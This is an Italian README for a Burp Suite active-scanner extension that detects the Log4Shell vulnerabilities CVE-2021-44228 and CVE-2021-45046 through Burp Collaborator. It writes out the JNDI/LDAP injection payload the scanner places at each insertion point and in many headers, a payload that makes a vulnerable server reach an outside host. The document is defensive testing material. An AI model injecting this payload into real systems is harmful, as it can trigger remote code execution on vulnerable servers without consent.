
Estensione di Burp Active Scan per identificare le vulnerabilità Log4j CVE-2021-44228 e CVE-2021-45046
Questa estensione dello Scanner Attivo di Burp Suite verifica lo sfruttamento delle vulnerabilità Apache Log4j CVE-2021-44228 e CVE-2021-45046.
Questa estensione utilizza Burp Collaborator per verificare il problema.
se vuoi eseguire solo i controlli di questo modulo, puoi importare il profilo extensions-only.json e selezionarlo come profilo di scansione attiva.
Durante una scansione attiva, i seguenti punti di inserimento vengono provati in questa estensione:
In ogni punto di inserimento, la richiesta viene iniettata con il seguente payload:
${jndi:ldap://{BURPCOLLABORATOR}/exploit.class}
Inoltre, questa estensione aggiunge molte intestazioni abilitate in headers (righe non commentate). Queste intestazioni vengono iniettate una alla volta in una richiesta separata.
Questo progetto è realizzato solo a scopo educativo e di test etico. L'uso di Log4Shell-active-scanner per attaccare target senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili di eventuali usi impropri o danni causati da questo programma.
Il progetto è concesso in licenza sotto la MIT License.